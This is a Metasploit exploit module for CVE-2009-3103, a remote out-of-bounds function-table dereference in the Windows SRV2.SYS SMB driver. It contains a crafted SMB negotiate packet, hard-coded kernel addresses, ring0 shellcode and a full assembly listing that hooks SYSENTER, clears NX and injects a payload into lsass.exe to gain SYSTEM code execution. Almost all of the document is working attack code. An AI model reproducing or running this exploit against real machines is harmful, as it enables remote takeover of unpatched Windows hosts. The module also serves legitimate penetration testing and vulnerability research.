Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::SMB  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',  
'Description' => %q{  
This module exploits an out of bounds function table dereference in the SMB  
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7  
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista  
without SP1 does not seem affected by this flaw.  
},  
  
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>   
[  
['CVE', '2009-3103'],  
['BID', '36299'],  
['OSVDB', '57799'],  
['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],  
['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 1024,  
'StackAdjustment' => -3500,  
'DisableNops' => true,  
'EncoderType' => Msf::Encoder::Type::Raw,  
},  
'Platform' => 'win',  
'Targets' =>  
[   
[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',  
{  
'Platform' => 'win',  
'Arch' => [ ARCH_X86 ],  
'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)  
'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).  
'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer  
'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0  
}  
],  
],  
'DefaultTarget' => 0  
))  
  
register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )  
end  
  
# The payload works as follows:  
# * Our sysenter handler and ring3 stagers are copied over to safe location.  
# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.  
# * The srv2.sys thread we are in is placed in a halted state.  
# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.  
# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.  
# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.  
# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.  
# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.  
def ring0_x86_payload( opts = {} )  
  
# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).  
pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00  
  
# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).  
kstager = opts['StagerAddressKernel'] || 0xFFDF0400  
  
# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).  
ustager = opts['StagerAddressUser'] || 0x7FFE0400  
  
# Target SYSTEM process to inject ring3 payload into.  
process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')  
  
# A simple hash of the process name based on the first 4 wide chars.  
# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)  
checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 )  
  
# The ring0 -> ring3 payload blob. Full assembly listing given below.  
r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +  
"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +  
"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +  
"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +  
"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +  
"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +  
"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +  
"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +  
"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +  
"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +  
"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +  
"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +  
"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"  
# Patch in the required values.  
r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )  
r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )  
r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )  
r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )  
r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )  
# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.  
return r0 + payload.encoded  
end  
  
def exploit  
print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )  
connect  
  
# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest   
# and srv2!SrvProcPartialCompleteCompoundedRequest  
dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]  
  
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')  
data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's  
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)  
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34   
data += [ 0x42424242 ].pack("V") * 7 # Unused  
data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)  
data += [ 0x41414141 ].pack("V") * 6 # Unused  
data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2  
data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode  
  
# We gain code execution by returning into the SMB packet, begining with its header.  
# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"  
# This will cause an access violation if executed as we can never set EBX to a valid pointer.  
# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.  
# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.  
# We patch the Signature1 value to be a jump forward into our shellcode.  
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct  
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE  
packet['Payload']['SMB'].v['Flags1'] = 0x18  
packet['Payload']['SMB'].v['Flags2'] = 0xC853  
packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']  
packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.  
packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...  
packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )  
packet['Payload'].v['Payload'] = data  
  
packet = packet.to_s  
  
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )  
sock.put( packet )  
  
  
wtime = datastore['WAIT'].to_i  
print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )  
stime = Time.now.to_i  
  
  
poke_logins = %W{Guest Administrator}  
poke_logins.each do |login|  
begin  
sec = connect(false)  
sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))  
rescue ::Exception => e  
sec.socket.close  
end   
end  
  
while( stime + wtime > Time.now.to_i )  
select(nil, nil, nil, 0.25)  
break if session_created?  
end  
  
handler  
disconnect  
end  
  
end  
  
=begin  
;===================================================================================  
; sf  
; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.  
; http://www.uninformed.org/?v=3&a=4&t=sumry  
;===================================================================================  
[bits 32]  
[org 0]  
;===================================================================================  
ring0_migrate_start:  
cld  
cli  
jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address  
ring0_migrate_patch:  
pop esi ; pop off ring0_stager_start address  
; get current sysenter msr (nt!KiFastCallEntry)  
push 0x176 ; SYSENTER_EIP_MSR  
pop ecx  
rdmsr  
; save origional sysenter msr (nt!KiFastCallEntry)  
mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax  
; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code  
mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]  
; patch sysenter msr to be our stager  
mov eax, edi  
wrmsr  
; copy over stager to shared memory  
mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )  
rep movsb  
sti ; set interrupt flag  
; Halt this thread to avoid problems.  
ring0_migrate_idle:  
hlt  
jmp short ring0_migrate_idle  
ring0_migrate_bounce:  
call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack  
;===================================================================================  
; This stager will now get called every time a ring3 process issues a sysenter  
ring0_stager_start:  
push byte 0 ; alloc a dword for the patched return address  
pushfd ; save flags and registers  
pushad  
call ring0_stager_eip  
ring0_stager_eip:  
pop eax  
; patch in the real nt!KiFastCallEntry address as our return address  
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]  
mov [ esp + 36 ], ebx  
; see if we are being told to remove our sysenter hook...  
cmp ecx, 0xDEADC0DE  
jne ring0_stager_hook  
push 0x176 ; SYSENTER_EIP_MSR  
pop ecx  
mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address  
xor edx, edx  
wrmsr  
xor eax, eax ; clear eax (the syscall number) so we can continue  
jmp short ring0_stager_finish  
ring0_stager_hook:  
; get the origional r3 return address (edx is the ring3 stack pointer)  
mov esi, [ edx ]  
; determine if the return is to a "ret" instruction  
movzx ebx, byte [ esi ]  
cmp bx, 0xC3  
; only insert our ring3 stager hook if we are to return to a single ret (for stability).  
jne short ring0_stager_finish  
; calculate our r3 address in shared memory  
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]  
lea ebx, [ ebx + ring3_start - ring0_stager_start ]  
; patch in our r3 stage as the r3 return address  
mov [ edx ], ebx  
; detect if NX is present (clobbers eax,ebx,ecx,edx)...  
mov eax, 0x80000001  
cpuid  
and edx, 0x00100000 ; bit 20 is the NX bit  
jz short ring0_stager_finish  
; modify the correct page table entry to make our ring3 stager executable  
mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).  
add edx, 4  
and dword [ edx ], 0x7FFFFFFF ; clear the NX bit  
; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).  
ring0_stager_finish:  
popad ; restore registers  
popfd ; restore flags  
ret ; return to real nt!KiFastCallEntry  
ring0_stager_data:  
dd 0xFFFFFFFF ; saved nt!KiFastCallEntry  
dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)  
dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)  
;===================================================================================  
ring3_start:  
pushad  
push byte 0x30  
pop eax  
cdq ; zero edx  
mov ebx, [ fs : eax ] ; get the PEB  
cmp [ ebx + 0xC ], edx  
jz ring3_finish  
mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)  
mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)  
add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).  
mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'  
add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'  
cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)  
jne ring3_finish ; if we are not currently in the correct process, return to real caller  
call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook  
call ring3_stager ; and then call the real ring3 payload  
jmp ring3_finish ; should the payload return we can resume this thread correclty.  
ring3_cleanup:  
mov ecx, 0xDEADC0DE ; set the magic value for ecx  
mov edx, esp ; save our esp in edx for sysenter  
sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).  
ring3_finish:  
popad  
ret ; return to the origional system calls caller  
;===================================================================================  
ring3_stager:  
; ...ring3 stager here...  
;===================================================================================  
=end  
`